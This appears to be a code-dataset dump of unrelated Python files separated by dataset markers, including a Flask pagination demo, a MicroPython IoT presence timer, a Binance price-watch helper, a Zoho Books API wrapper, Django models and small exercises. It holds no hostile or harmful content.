class Movie(db.Model):
    """Demo movie row used by the pagination example."""
    _id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(55), nullable=False)
    genre = db.Column(db.String(55), nullable=False)
    publish_year = db.Column(db.Integer, nullable=False)
    rating = db.Column(db.Float, nullable=False)  # one-decimal value in [0, 5]
@app.before_first_request
def generate_fake_data():
    """Reset the in-memory database and seed it with 30 random movies."""
    db.drop_all()
    db.create_all()
    db.session.add_all(
        Movie(
            title=f'Title {i + 1}',
            genre=f'Genre {i + 1}',
            publish_year=random.randint(2000, 2021),
            rating=round(random.uniform(0, 5), 1),
        )
        for i in range(30)
    )
    db.session.commit()
@app.route('/')
def index():
    # Landing page linking the component demos.
    return render_template('index.html')
@app.route('/nav')
def test_nav():
    # Demo of the nav component.
    return render_template('nav.html')
@app.route('/pagination')
def test_pagination():
    # Paginated movie listing, 6 rows per page; ?page=N selects the page.
    page = request.args.get('page', 1, type=int)
    pagination = Movie.query.paginate(page, per_page=6)
    movies = pagination.items
    return render_template('pagination.html', pagination=pagination, movies=movies)
@app.route('/badge')
def test_badge():
    # Demo of the badge component.
    return render_template('badge.html')
if __name__ == '__main__':
    app.run(debug=True)
| StarcoderdataPython |
3554779 | #########
from aliyunIoT import Device # iot组件是连接阿里云物联网平台的组件
import network # Wi-Fi功能所在库
import ujson
##################
from driver import I2C,GPIO,TIMER
import utime
from ssd1306 import SSD1306_I2C
import ir
import time
temptimerObj = 0
time_dict = {}
#########
# 物联网平台连接标志位
iot_connected = False
wlan = None
# 三元组信息
productKey = "产品密钥" #需要填入物联网云平台申请到的productKey信息
deviceName = "设备名称" #需要填入物联网云平台申请到的deviceName信息
deviceSecret = "设备密钥" #需要填入物联网云平台申请到的deviceSecret信息
# 物联网设备实例
device = None
# Wi-Fi SSID和Password设置
wifiSsid = "请填写您的路由器名称"
wifiPassword = "<PASSWORD>路由器密码"
# 等待Wi-Fi成功连接到路由器
# Block until the Wi-Fi connection to the router succeeds.
def get_wifi_status():
    global wlan
    wifi_connected = False
    wlan.active(True)  # activate the WLAN interface
    wlan.scan()  # scan for access points
    #print("start to connect ", wifiSsid)
    wlan.connect(wifiSsid, wifiPassword)  # connect using the configured SSID/password
    while True:
        wifi_connected = wlan.isconnected()  # query the connection state
        if wifi_connected:  # leave the loop once connected
            break
        else:
            utime.sleep(0.5)
    print("wifi_connected:", wifi_connected)
    ifconfig = wlan.ifconfig()  # interface IP / netmask / gateway / DNS
    print(ifconfig)
    utime.sleep(0.5)
# Callback invoked once the connection to the IoT platform succeeds.
def on_connect(data):
    global iot_connected
    iot_connected = True
# Handler for 'props' events (the cloud pushing properties down to the device).
def on_props(request):
    pass
# Upload the rest-reminder state (1 = needs rest, 0 = left) to the IoT platform.
def report_event(data):
    upload_data = {'params': ujson.dumps({
        'call_rst': data,
        })
    }
    device.postProps(upload_data)
def connect_lk(productKey, deviceName, deviceSecret):
    """Connect this device to the Aliyun IoT platform and wait for success."""
    global device, iot_connected
    key_info = {
        'region': 'cn-shanghai',
        'productKey': productKey,
        'deviceName': deviceName,
        'deviceSecret': deviceSecret,
        'keepaliveSec': 60
    }
    # Hand the device triple (key/name/secret) to the iot component.
    device = Device()
    # Register the on_connect callback, fired when the connection succeeds.
    device.on(Device.ON_CONNECT, on_connect)
    # Register the handler for property-control messages from the platform.
    device.on(Device.ON_PROPS, on_props)
    # Start connecting to the Aliyun IoT platform.
    device.connect(key_info)
    # Wait (polling once per second) until the connection is established.
    while(True):
        if iot_connected:
            print('物联网平台连接成功')
            break
        else:
            print('sleep for 1 s')
            utime.sleep(1)
    print('sleep for 2s')
    utime.sleep(2)
#########
PERSON_MOVE = 1
PERSON_LEAVE = 2
PERSON_NOMOVE = 3
ir_event = 0
tick_time = 0
total_time = 0
first_move = 0
has_rest = 0
has_leve = 0
timer_interval_1000ms = 1000 #单位ms
check_max_time1 = (90) #单位s ,用于判断当前区域没有人的时间阈值 (60*timer_interval_1000ms)
check_max_time2 = (45*60) #单位s,用于判断人在当前区域的最大时间阈值 (60*60*timer_interval_1000ms)
CHECK_NOPERSON_MAX_TIME = check_max_time1
CHECK_HASPERSON_MAX_TIME = check_max_time2
gpioirDev =0
def irq_handler(data):
    """IR sensor interrupt: update presence state and accumulated work time.

    tick_time counts seconds since the last sensor event; total_time
    accumulates seconds of continuous presence in the monitored area.
    """
    global tick_time,total_time,gpioirDev,first_move,has_rest,has_leve,ir_event
    if first_move == 0:
        # First ever event: start the timer-driven counting (see timer_callback).
        first_move = 1
    ret = gpioirDev.read()
    if ret == 1:
        # Motion detected.
        print('person come')
        if tick_time >= CHECK_NOPERSON_MAX_TIME:
            # No movement for so long that the person must have left earlier;
            # reset the counters and report the departure.
            print("person has left ",tick_time)
            total_time = 0
            tick_time = 0
            has_leve = 1
            ir_event = PERSON_LEAVE
            return
        else:
            # Still present: fold the idle gap into the total and keep counting.
            total_time += tick_time
            print("check person move ",tick_time,total_time)
            tick_time = 0
            ir_event = PERSON_MOVE
    elif ret == 0:
        # Sensor reports no movement; accumulate the elapsed time anyway.
        total_time += tick_time
        print('check person nomove ',tick_time,total_time)
        tick_time = 0
        ir_event = PERSON_NOMOVE
    if total_time >= CHECK_HASPERSON_MAX_TIME:
        # Continuous presence exceeded the work-time threshold: flag a rest.
        has_rest = 1
        total_time = 0
        print('you need has rest,because you work too long')
# init function
def ir_check_init():
    """Open the IR sensor GPIO, attach the interrupt handler and seed ir_event
    from the current sensor reading."""
    global gpioirDev,ir_event
    gpioirDev = GPIO()
    gpioirDev.open("ir")
    gpioirDev.on(irq_handler)
    irDev = ir.IR(gpioirDev)
    ret = gpioirDev.read()
    if ret == 1:
        print('person come')
        ir_event = PERSON_MOVE
    elif ret == 0:
        print('no person')
        # BUGFIX: was `ir_event == PERSON_NOMOVE` — a no-op comparison that
        # left the module-level state flag unset when nobody was present.
        ir_event = PERSON_NOMOVE
# Initialise the OLED module and draw the placeholder start-up screen.
def oled_init():
    global oled
    i2cObj = I2C()
    i2cObj.open("ssd1306")
    print("ssd1306 inited!")
    oled = SSD1306_I2C(128, 64, i2cObj)
    oled.fill(0)  # clear the screen to black
    oled.text('2022-01-03', 30, 5)
    oled.text('12:00:00', 30, 22)
    oled.text(str('----------------------'),3,32)
    oled.text('connecting', 30, 40)
    oled.show()
def display_time(timeArray):
    """Redraw the OLED with date, time, elapsed minutes and presence state."""
    global total_time, tick_time
    # Minutes of accumulated presence (counted + not-yet-folded seconds).
    minutes = int((total_time + tick_time) / 60)
    oled.fill(0)
    oled.text(str('%d-%02d-%02d' % (timeArray[0], timeArray[1], timeArray[2])), 30, 5)
    oled.text(str('%02d:%02d:%02d' % (timeArray[3], timeArray[4], timeArray[5])), 30, 22)
    oled.text(str('----------------------'), 3, 32)
    if ir_event == PERSON_LEAVE:
        oled.text('person leave', 25, 40)
        oled.text(str('--'), 2, 13)
    elif ir_event == PERSON_MOVE:
        oled.text('move', 40, 40)
        oled.text(str('%02d' % (minutes)), 4, 13)
    elif ir_event == PERSON_NOMOVE:
        oled.text('no move', 40, 40)
        oled.text(str('%02d' % (minutes)), 4, 13)
    oled.show()
def timer_callback(args):
    # Fires once per second: refresh the display and, once the first motion
    # has been seen (and the person has not left), count another second.
    global tick_time,first_move,time_dict
    timeArray = time.localtime()
    display_time(timeArray)
    if first_move == 1 and has_leve == 0:
        tick_time += 1
def temp_timer_stop():
    # Pause the periodic 1-second timer.
    temptimerObj.stop()
def temp_timer_start():
    # Resume the periodic 1-second timer.
    temptimerObj.start()
def timer_init():
    # Create and start the periodic timer that drives timer_callback.
    global temptimerObj
    temptimerObj = TIMER(0)
    temptimerObj.open(mode=temptimerObj.PERIODIC, period=timer_interval_1000ms, callback=timer_callback)
    temptimerObj.start()
if __name__ == '__main__' :
    oled_init()
    #########
    wlan = network.WLAN(network.STA_IF)  # create the WLAN (station mode) object
    get_wifi_status()
    connect_lk(productKey, deviceName, deviceSecret)
    #########
    ir_check_init()
    timer_init()
    # Main loop: forward the flags set by the IR interrupt handler to the
    # cloud (1 = needs a rest, 0 = person left), then clear them.
    while True:
        if has_rest == 1:
            has_rest = 0
            report_event(1)
            print('report rest')
        if has_leve == 1:
            has_leve = 0
            report_event(0)
            print('report leve')
        utime.sleep(1)
| StarcoderdataPython |
3282785 | from appium.webdriver import webdriver
from datetime import datetime
from selenium.common.exceptions import WebDriverException
"""
To get to know how to use this project: https://github.com/AntoData/appium-framework/wiki
"""
class ScreenshotUtils:
    """Captures screenshots for the currently running test.

    The destination folder comes from the driver's custom capability
    "screenshots_path"; each file is named with a timestamp (down to the
    microsecond, via %f) so names never collide.
    """

    def __init__(self, driver: webdriver):
        """Store the driver whose view will be captured.

        :param driver: Instance of webdriver carrying the custom
            "screenshots_path" capability.
        """
        self.__driver = driver

    def take_screenshot(self) -> None:
        """Save a screenshot into the folder configured for this test run.

        :return: None
        """
        # Timestamped file name, e.g. 2023_01_31-12_00_00_123456.png
        stamp = datetime.now().strftime("%Y_%m_%d-%H_%M_%S_%f")
        target_path: str = self.__driver.capabilities["screenshots_path"]
        target_path = target_path + "//" + stamp + ".png"
        try:
            self.__driver.get_screenshot_as_file(target_path)
        except WebDriverException as e:
            # The app under test may forbid screenshots of a view (the
            # developer set FLAG_SECURE); report it and keep running.
            print("{0}: We can't take a screenshot of this view, the developer set the following flag"
                  " 'LayoutParams.FLAG_SECURE'".format(e))
            print("We caught this and go on with the execution")
| StarcoderdataPython |
8144215 | from object_database.web.cells.cells import Cells
from object_database.web.cells.cell import Cell, context
from object_database.web.cells.main import Main
from object_database.web.cells.root_cell import RootCell
from object_database.web.cells.scrollable import Scrollable, VScrollable, HScrollable
from object_database.web.cells.layout import (
FillSpace,
HCenter,
VCenter,
Center,
Top,
Left,
LeftCenter,
Bottom,
Right,
RightCenter,
TopLeft,
TopCenter,
TopRight,
BottomLeft,
BottomCenter,
BottomRight,
)
from object_database.web.cells.flex import Flex
from object_database.web.cells.grid import Grid
from object_database.web.cells.header_bar import HeaderBar
from object_database.web.cells.columns import Columns
from object_database.web.cells.highlighted import Highlighted
from object_database.web.cells.expands import Expands
from object_database.web.cells.dropdown import Dropdown
from object_database.web.cells.dropdown_drawer import DropdownDrawer, CircleLoader
from object_database.web.cells.container import Container
from object_database.web.cells.deprecated import LargePendingDownloadDisplay
from object_database.web.cells.panel import CollapsiblePanel, Panel
from object_database.web.cells.non_builtin_cell import NonBuiltinCell
from object_database.web.cells.popover import Popover
from object_database.web.cells.tabs import Tabs
from object_database.web.cells.sized import Sized
from object_database.web.cells.context_menu import ContextMenu
from object_database.web.cells.menu_item import MenuItem
from object_database.web.cells.session_state import sessionState, SessionState
from object_database.web.cells.leaves import (
Octicon,
Badge,
Text,
Traceback,
Code,
Timestamp,
Span,
)
from object_database.web.cells.sequence import Sequence, HorizontalSequence
from object_database.web.cells.subscribed import (
Subscribed,
SubscribedSequence,
HorizontalSubscribedSequence,
HSubscribedSequence,
VSubscribedSequence,
)
from object_database.web.cells.webgl_plot import WebglPlot
from object_database.web.cells.card import Card, CardTitle
from object_database.web.cells.modal import Modal, ButtonModal
from object_database.web.cells.button import Clickable, Button, ButtonGroup
from object_database.web.cells.single_line_text_box import SingleLineTextBox
from object_database.web.cells.slot import Slot
from object_database.web.cells.computed_slot import ComputedSlot
from object_database.web.cells.contextual_display import ContextualDisplay, registerDisplay
from object_database.web.cells.views.split_view import SplitView
from object_database.web.cells.code_editor import CodeEditor
from object_database.web.cells.plot import Plot
from object_database.web.cells.table import Table
from object_database.web.cells.padding import Padding
from object_database.web.cells.border import Border
from object_database.web.cells.views.page_view import PageView
from .non_display.key_action import KeyAction
from object_database.web.cells.util import (
ensureSubscribedType,
ensureSubscribedSchema,
wrapCallback,
SubscribeAndRetry,
waitForCellsCondition,
)
from .sheet import Sheet
from object_database.web.cells.views.resizable_panel import ResizablePanel
from object_database.web.cells.children import Children
MAX_FPS = 50
| StarcoderdataPython |
5049053 | <reponame>VictorOnink/Particle-Trajectory-Analysis
import socket
import os
# Checking which computer the code is running on
HOSTNAME = 'Victors-MBP.home'
if socket.gethostname() == HOSTNAME:
    SERVER = 'laptop'
else:
    SERVER = 'remote_server'
# NOTE(review): raises KeyError at import time if JOB_ID is not exported —
# confirm the scheduler always sets it.
JOB_ID = int(os.environ["JOB_ID"])
# Setting directory paths
machine_home_directory = os.path.expanduser('~')
ROOT_DIREC_DICT = {'laptop': machine_home_directory + '/Desktop/Pau data analysis/',
                   'remote_server': machine_home_directory + '/PauProject/'}
ROOT_DIREC = ROOT_DIREC_DICT[SERVER]
DATA_DIREC = ROOT_DIREC + 'Data/'
FIGURE_DIREC = ROOT_DIREC + 'Figures/'
OUTPUT_DIREC = ROOT_DIREC + 'Output/'
# Names of the video files
VIDEO_LIST = ['SchwarzD_1.mp4', 'SchwarzD_2.mp4', 'SchwarzD_3.mp4', 'SchwarzG_1.mp4', 'SchwarzG_2.mp4',
              'SchwarzG_3.mp4', 'SchwarzP_1.mp4', 'SchwarzP_2.mp4', 'SchwarzP_3.mp4']
9644286 | from typing import List
class Solution:
    def swap(self, s, pair_index: List):
        """Return a copy of *s* with the two positions in *pair_index* exchanged."""
        s_list = list(s)
        s_list[pair_index[0]], s_list[pair_index[1]] = s_list[pair_index[1]], s_list[pair_index[0]]
        return ''.join(s_list)

    def smallestStringWithSwaps(self, s: str, pairs: List[List[int]]) -> str:
        """Return the lexicographically smallest string reachable via the swaps.

        BUGFIX: the previous greedy loop repeatedly applied single swaps and
        accepted only immediate improvements, which does not reach the true
        minimum in general (and printed debug output). Since swaps within a
        pair can be repeated, all indices connected through `pairs` form a
        group whose characters can be permuted freely — so sort each group's
        characters into its (ascending) index positions. O(n log n) overall.
        """
        parent = list(range(len(s)))

        def find(i: int) -> int:
            # Union-find root lookup with path halving.
            while parent[i] != i:
                parent[i] = parent[parent[i]]
                i = parent[i]
            return i

        for a, b in pairs:
            root_a, root_b = find(a), find(b)
            if root_a != root_b:
                parent[root_a] = root_b

        # Group indices by component root; indices stay in ascending order.
        groups = {}
        for i in range(len(s)):
            groups.setdefault(find(i), []).append(i)

        chars = list(s)
        for indices in groups.values():
            ordered = sorted(chars[i] for i in indices)
            for i, c in zip(indices, ordered):
                chars[i] = c
        return ''.join(chars)
if __name__ == '__main__':
    # Quick manual check of the solver.
    s = Solution()
    ss = "dcab"
    # print(s.swap(ss, [1, 2]))
    pairs = [[0, 3], [1, 2], [0, 2]]
    print(s.smallestStringWithSwaps(ss, pairs))
| StarcoderdataPython |
1836416 | <reponame>Ohara124c41/Nao-Robot
import sys
from naoqi import ALProxy
def main(robotIP = "192.168.0.117", PORT=9559):
try:
postureProxy = ALProxy("ALRobotPosture", "192.168.0.117", 9559)
except Exception, e:
print "Could not create proxy to ALRobotPosture"
print "Error was: ", e
postureProxy.goToPosture("StandInit", 1.0)
print postureProxy.getPostureFamily()
if __name__ == "__main__":
robotIp = "127.0.0.1"
if len(sys.argv) <= 1:
print "Usage python alrobotposture.py robotIP (optional default: 127.0.0.1)"
else:
robotIp = sys.argv[1]
main("192.168.0.117")
motionProxy.rest() | StarcoderdataPython |
11285059 | <reponame>vutsalsinghal/python-terrascript
# terrascript/grafana/__init__.py
import terrascript
class grafana(terrascript.Provider):
    """Terrascript provider block for Grafana; all behaviour is inherited."""
    pass
9753822 |
import pkgutil
import custompack.custom as custom
# See https://stackoverflow.com/questions/1707709/list-all-the-modules-that-are-part-of-a-python-package/1707786#
# Enumerate the direct submodules/subpackages of the custompack.custom package.
package = custom
for importer, modname, ispkg in pkgutil.iter_modules(package.__path__):
    print("Found submodule %s (is a package: %s)" % (modname, ispkg))
| StarcoderdataPython |
279899 |
from numpy import *
import matplotlib.pyplot as plt
from scipy import interpolate
import sys
# Build an empirical CDF from column 6 of the input file, fit a cubic
# spline through it, and plot CDF plus its derivative (the PDF).
# Usage: script.py <input.dat> <output-figure>
# NOTE(review): relies on `from numpy import *` — sort/loadtxt/size etc. are
# numpy names; consider a namespaced import.
# x = loadtxt('cdf_r.dat')
# y = arange(0, size(x),1)/float(size(x))
U_x = sort(loadtxt(sys.argv[1])[:,6])  # presumably an energy/distance column — TODO confirm
# Truncate the sorted sample at the first value above 1.5.
for cnt in range(size(U_x)):
    if U_x[cnt] > 1.5:
        break;
U_x = U_x[:cnt]
# Subsample 5000 evenly spaced points to keep the spline fit tractable.
U_t = []
for i in linspace(0,size(U_x)-1, 5000):
    U_t.append(U_x[int(i)])
N_t = size(U_t)
# Empirical CDF values 0 .. (N_t-1)/N_t for the subsampled points.
y = arange(0, N_t, 1)/float(N_t)
U_t_min = min(U_t)
U_t_max = max(U_t)
# Cubic interpolating spline (s=0: pass through every point).
tck = interpolate.splrep(U_t,y,k=3,s=0)
U_tnew = linspace(U_t_min, U_t_max, 5000)
# xnew = arange(min(x), max(x), 0.0001)
ynew = interpolate.splev(U_tnew, tck, der=0)
# First derivative of the CDF spline = estimated PDF.
diff = interpolate.splev(U_tnew, tck, der=1)
# ref_line = asarray([[1., -0.1],
#                     [1., 5]])
plt.clf()
fig, ax1 = plt.subplots()
leg = []
ax2 = ax1.twinx()  # second y-axis for the PDF curve
leg.append(ax1.plot(U_t, y, 'bo', markerfacecolor='white', markeredgecolor='blue', label='CDF(U), data')[0])
leg.append(ax1.plot(U_tnew, ynew, 'r-', label='CDF(U), interpolated')[0])
leg.append(ax2.plot(U_tnew, diff, 'k-', label = 'PDF(r)')[0])
# leg.append(ax2.plot(t_cheby, diff_cheby, 'g-', label='PDF(r), Chebyshev')[0])
# leg.append(ax2.plot(ref_line[:,0], ref_line[:,1], 'r--', linewidth=3, label='Range for Repulsion')[0])
ax1.grid('on')
ax1.set_xlabel('distance, r')
ax1.set_ylabel('cumulative distribution function for energy, CDF(r)')
ax2.set_ylabel('probability distribution function from cdf, PDF(r)')
# legend_line = ax.legend(handles=leg, loc = 'upper left', numpoints=1)
plt.legend(handles=leg, loc = 'upper left', numpoints=1, ncol=2)
# ax1.axis([t_min, t_max, -0.1, 1])
# ax2.axis([t_min, t_max, -0.1, 5])
plt.savefig(sys.argv[2])
# plt.show()
# c = get_polynomial_from_Cheby(tnew, ynew, 12)
# t_cheby = linspace(min(tnew), max(tnew), 100)
# y_cheby = gen_from_polynomial(t_cheby, c)
# diff_cheby = diff_gen_from_polynomial(t_cheby, c)
222097 | # -------------------- PATH ---------------------
#ROOT_PATH = "/local/data2/pxu4/TypeClassification"
ROOT_PATH = "."
DATA_PATH = "%s/data" % ROOT_PATH
ONTONOTES_DATA_PATH = "%s/OntoNotes" % DATA_PATH
BBN_DATA_PATH="%s/BBN" % DATA_PATH
LOG_DIR = "%s/log" % ROOT_PATH
CHECKPOINT_DIR = "%s/checkpoint" % ROOT_PATH
OUTPUT_DIR = "%s/output" % ROOT_PATH
PKL_DIR='./pkl'
EMBEDDING_DATA = "%s/glove.840B.300d.txt" % DATA_PATH  # GloVe 300-d vectors
testemb='testemb'
prep='prep'
# -------------------- DATA ----------------------
# Train/dev/test splits and cached type inventories for both corpora.
ONTONOTES_ALL = "%s/all.txt" % ONTONOTES_DATA_PATH
ONTONOTES_TRAIN = "%s/train.txt" % ONTONOTES_DATA_PATH
ONTONOTES_VALID = "%s/dev.txt" % ONTONOTES_DATA_PATH
ONTONOTES_TEST = "%s/test.txt" % ONTONOTES_DATA_PATH
ONTONOTES_TYPE = "%s/type.pkl" % ONTONOTES_DATA_PATH
ONTONOTES_TRAIN_CLEAN = "%s/train_clean.tsv" % ONTONOTES_DATA_PATH
ONTONOTES_TEST_CLEAN = "%s/test_clean.tsv" % ONTONOTES_DATA_PATH
BBN_ALL = "%s/all.txt" % BBN_DATA_PATH
BBN_TRAIN = "%s/train.txt" % BBN_DATA_PATH
BBN_VALID = "%s/dev.txt" % BBN_DATA_PATH
BBN_TEST = "%s/test.txt" % BBN_DATA_PATH
BBN_TRAIN_CLEAN = "%s/train_clean.tsv" % BBN_DATA_PATH
BBN_TEST_CLEAN = "%s/test_clean.tsv" % BBN_DATA_PATH
BBN_TYPE = "%s/type.pkl" % BBN_DATA_PATH
# --------------------- PARAM -----------------------
MAX_DOCUMENT_LENGTH = 30
MENTION_SIZE = 15
WINDOW_SIZE = 10
RANDOM_SEED = 2017
6543128 | import typing as t
from dagos.core.components import SoftwareComponent
from dagos.platform import OperatingSystem
from dagos.platform import PlatformIssue
from dagos.platform import PlatformSupportChecker
class GitHubCliSoftwareComponent(SoftwareComponent):
    """
    Manage the GitHub CLI.

    The GitHub CLI is useful for interacting with GitHub from the command line.

    Project home: <https://github.com/cli/cli>
    """

    def __init__(self) -> None:
        super().__init__("github-cli")

    def supports_platform(self) -> t.List[PlatformIssue]:
        # Only Linux is checked as a supported operating system.
        result = PlatformSupportChecker().check_operating_system(
            [OperatingSystem.LINUX]
        )
        return result.issues
| StarcoderdataPython |
1963641 | import os
from time import time
from binance.client import Client
from binance.exceptions import BinanceAPIException
from dotenv import load_dotenv
load_dotenv()
API_KEY = os.getenv("BINANCE_API_KEY")
SECRET_KEY = os.getenv("BINANCE_SECRET_KEY")
client = Client(API_KEY, SECRET_KEY)
def generate_watchpair_msg(watchpair):
    """Build a one-line status message for a watched pair.

    Returns (message, last_price). watchpair layout (by index): [1] symbol,
    [3] price recorded when the watch was created.
    """
    ticker = client.get_ticker(symbol=watchpair[1])
    last_price = float(ticker['lastPrice'])
    change = float(ticker['priceChangePercent'])
    # Arrow shows movement relative to the price stored at watch creation.
    if last_price > watchpair[3]:
        arrow = '↑'
    elif last_price < watchpair[3]:
        arrow = '↓'
    else:
        arrow = '→'
    # Prices above 1 get two decimals; sub-unit prices keep all eight.
    if last_price > 1:
        formatted_price = "%.2f" % last_price
    else:
        formatted_price = "%.8f" % last_price
    return f'{arrow} {watchpair[1]} {formatted_price} ({"%+.1f" % change}%)', last_price
def create_watchpair(chat_id, args):
    """Validate /watch arguments and build a new watchpair record.

    Returns [[chat_id, pair, refresh, last_price, created_ts], None] on
    success, or (False, <error message>) when the input is invalid.
    """
    if len(args) != 2:
        return False, 'Usage:\n/watch <pair> <interval>'
    # BUGFIX / consistency with create_watchtrade: a non-numeric interval
    # previously raised an unhandled ValueError here instead of returning
    # the 'Invalid interval.' message.
    try:
        refresh = int(args[1])
    except ValueError:
        return False, 'Invalid interval.'
    if not 1 <= refresh <= 1440:
        return False, 'Invalid interval.'
    pair = args[0]
    try:
        price = client.get_ticker(symbol=pair)['lastPrice']
    except BinanceAPIException:
        return False, 'Invalid pair.'
    return [[chat_id, pair, refresh, float(price), int(time())], None]
def create_watchtrade(chat_id, args):
    """Validate /wtrade arguments and build a new watchtrade record.

    Returns [[chat_id, pair, refresh, last_price, created_ts, enterprice], None]
    on success, or (False, <error message>) when the input is invalid.
    Validation order (interval -> pair -> enterPrice) determines which error
    message wins when several inputs are bad.
    """
    if len(args) != 3:
        return False, 'Usage:\n/wtrade <pair> <interval> <enterPrice>'
    try:
        refresh = int(args[1])
        # Interval is in minutes, capped at one day.
        if not 1 <= refresh <= 1440:
            raise ValueError
    except ValueError:
        return False, 'Invalid interval.'
    pair = args[0]
    try:
        price = client.get_ticker(symbol=pair)['lastPrice']
    except BinanceAPIException:
        return False, 'Invalid pair.'
    try:
        enterprice = float(args[2])
        # NOTE(review): 0 is accepted here, which later allows a division by
        # zero in generate_tradeposition_msg — confirm whether 0 is valid.
        if enterprice < 0:
            raise ValueError
    except ValueError:
        return False, 'Invalid enterPrice.'
    return [[chat_id, pair, refresh, float(price), int(time()), enterprice], None]
def generate_tradeposition_msg(enterprice, actualprice):
    """Return the trade's current/entry price ratio formatted as '[x.xx]'.

    NOTE(review): raises ZeroDivisionError when enterprice is 0 — confirm
    callers never pass 0.
    """
    ratio = actualprice / enterprice
    return f'[{"%.2f" % ratio}]'
| StarcoderdataPython |
5190581 | import warnings
from django.db import models
from django.contrib.postgres.fields import JSONField
from django.utils.functional import cached_property
class BasePBNModel(models.Model):
    """Abstract base adding creation/update timestamps to every PBN model."""
    created_on = models.DateTimeField(auto_now_add=True)
    last_updated_on = models.DateTimeField(auto_now=True)
    class Meta:
        abstract = True
MAX_TEXT_FIELD_LENGTH = 350
class BasePBNMongoDBModel(BasePBNModel):
    """Abstract base for records mirrored from a MongoDB export.

    The raw document versions live in the ``versions`` JSON field; selected
    values from the current version are "pulled up" into plain columns on
    save so they can be indexed and queried.
    """
    mongoId = models.CharField(max_length=32, primary_key=True)
    status = models.CharField(max_length=32, db_index=True)
    verificationLevel = models.CharField(max_length=32, db_index=True)
    verified = models.BooleanField(default=False, db_index=True)
    versions = JSONField()
    # Names of the fields pulled "up" from the JSON dictionary (the 'values'
    # payload) onto object attributes; subclasses set this to a sequence.
    pull_up_on_save = None
    def _pull_up_on_save(self):
        # For each attribute: prefer a custom pull_up_<attr>() hook, otherwise
        # read current_version['object'][<attr>].
        for attr in self.pull_up_on_save:
            if hasattr(self, f"pull_up_{attr}"):
                fn = getattr(self, f"pull_up_{attr}")
                v = fn()
            else:
                v = self.value_or_none("object", attr)
            if v is not None:
                # Only broken records contain very long entries (fields tens of
                # kilobytes long — e.g. one record has 10 kB of comma-separated
                # surnames in its 'surname' field). PostgreSQL has a limit on
                # the size of an index row, so we truncate to respect it:
                if isinstance(v, str):
                    if len(v) >= MAX_TEXT_FIELD_LENGTH:
                        v = v[:MAX_TEXT_FIELD_LENGTH]
                setattr(self, attr, v)
    def save(
        self, force_insert=False, force_update=False, using=None, update_fields=None
    ):
        # Refresh the pulled-up columns before delegating to Django's save.
        if self.pull_up_on_save:
            self._pull_up_on_save()
        return super(BasePBNMongoDBModel, self).save(
            force_insert=force_insert,
            force_update=force_update,
            using=using,
            update_fields=update_fields,
        )
    @cached_property
    def current_version(self):
        # First version dict flagged "current"; None when versions is empty
        # or nothing is flagged. Cached for the object's lifetime.
        if self.versions:
            for elem in self.versions:
                if elem["current"]:
                    return elem
    def value(self, *path, return_none=False):
        """Walk ``path`` into the current version dict.

        On a missing version or key: returns None when return_none is True,
        otherwise a "[brak …]" placeholder string ("brak" = missing).
        """
        v = self.current_version
        if v is None:
            warnings.warn(
                f"Model {self.__class__} with id {self.mongoId} has NO current_version!"
            )
            if return_none:
                return
            return "[brak current_version]"
        for elem in path:
            if elem in v:
                v = v[elem]
            else:
                if return_none:
                    return None
                return f"[brak {elem}]"
        return v
    def value_or_none(self, *path):
        # Convenience wrapper: missing data yields None, never a placeholder.
        return self.value(*path, return_none=True)
    def website(self):
        return self.value("object", "website")
    class Meta:
        abstract = True
| StarcoderdataPython |
1891790 | <filename>Code.py<gh_stars>0
# Prints the prime numbers, one per line, counting upward forever.


def is_prime(n):
    """Return True if *n* is prime.

    Primes start at 2; 0, 1 and negative numbers are not prime.  Trial
    division only needs to run up to sqrt(n), which is both correct and
    much faster than testing every i < n.
    """
    if n < 2:
        # Bug fix: the original loop never ran for n == 1 and therefore
        # reported "1 is a prime", but 1 is not a prime number.
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i = i + 1
    return True


if __name__ == "__main__":
    # Guarded so that importing this module does not start the endless loop.
    target = 1
    while 1:
        if is_prime(target):
            print(target, "is a prime")
        target = target + 1
| StarcoderdataPython |
1919944 | """
curso Python 3 - Exercício Python #005
crie um programa que leia um numero inteiro e mostre na tela seu sucessor e antecessor
20.10.2020 - <NAME>
"""
def successor_predecessor(n):
    """Return the (successor, predecessor) pair of the integer *n*."""
    return n + 1, n - 1


def main():
    # Read an integer and report its successor and predecessor (exercise #005).
    n1 = int(input('Digite um numero inteiro '))
    d, a = successor_predecessor(n1)
    print('O numero inteiro digitado foi {}, seu sucessor é {} e antecessor é {}'.format(n1, d, a))


if __name__ == '__main__':
    # Guarded so importing this module does not block on input().
    main()
| StarcoderdataPython |
8176591 | #$Id$#
from books.util.ZohoHttpClient import ZohoHttpClient
from books.parser.SettingsParser import SettingsParser
from books.api.Api import Api
from json import dumps
# Shared module-level collaborators used by every OrganizationsApi call.
base_url = Api().base_url + 'organizations/'  # root URL of the organizations endpoints
zoho_http_client = ZohoHttpClient()  # performs the actual HTTP requests
parser = SettingsParser()  # converts JSON responses into model objects
class OrganizationsApi:
    """Wrapper around the Zoho Books organizations endpoints.

    Supports:
        1. Listing organizations.
        2. Fetching the details of a single organization.
        3. Creating an organization.
        4. Updating an organization.
    """

    def __init__(self, authtoken, organization_id):
        """Store the credentials sent along with every request.

        Args:
            authtoken(str): User's Authtoken.
            organization_id(str): User's Organization id.
        """
        self.details = {
            'authtoken': authtoken,
            'organization_id': organization_id
        }

    def get_organizations(self):
        """Fetch the list of all organizations.

        Returns:
            instance: Organizations list object.
        """
        response = zoho_http_client.get(base_url, self.details)
        return parser.get_organizations(response)

    def get(self, organization_id):
        """Fetch a single organization by id.

        Args:
            organization_id(str): Organization id.

        Returns:
            instance: Organization object.
        """
        response = zoho_http_client.get(base_url + organization_id, self.details)
        return parser.get_organization(response)

    def create(self, organization):
        """Create an organization.

        Args:
            organization(instance): Organization object.

        Returns:
            instance: Organization object.
        """
        payload = {
            'JSONString': dumps(organization.to_json())
        }
        response = zoho_http_client.post(base_url, self.details, payload)
        return parser.get_organization(response)

    def update(self, organization_id, organization):
        """Update an existing organization.

        Args:
            organization_id(str): Organization id.
            organization(instance): Organization object.

        Returns:
            instance: Organization object.
        """
        payload = {
            'JSONString': dumps(organization.to_json())
        }
        response = zoho_http_client.put(base_url + organization_id, self.details, payload)
        return parser.get_organization(response)
| StarcoderdataPython |
3570980 | <reponame>nielsvanhooy/genieparser
""" show_hsrp_statistics.py
IOSXR parsers for the following show commands:
* show hsrp statistics
* show hsrp {interface} statistics
* show hsrp {interface} {group_number} statistics
* show hsrp status
"""
# Python
import re
# Metaparser
from genie.metaparser import MetaParser
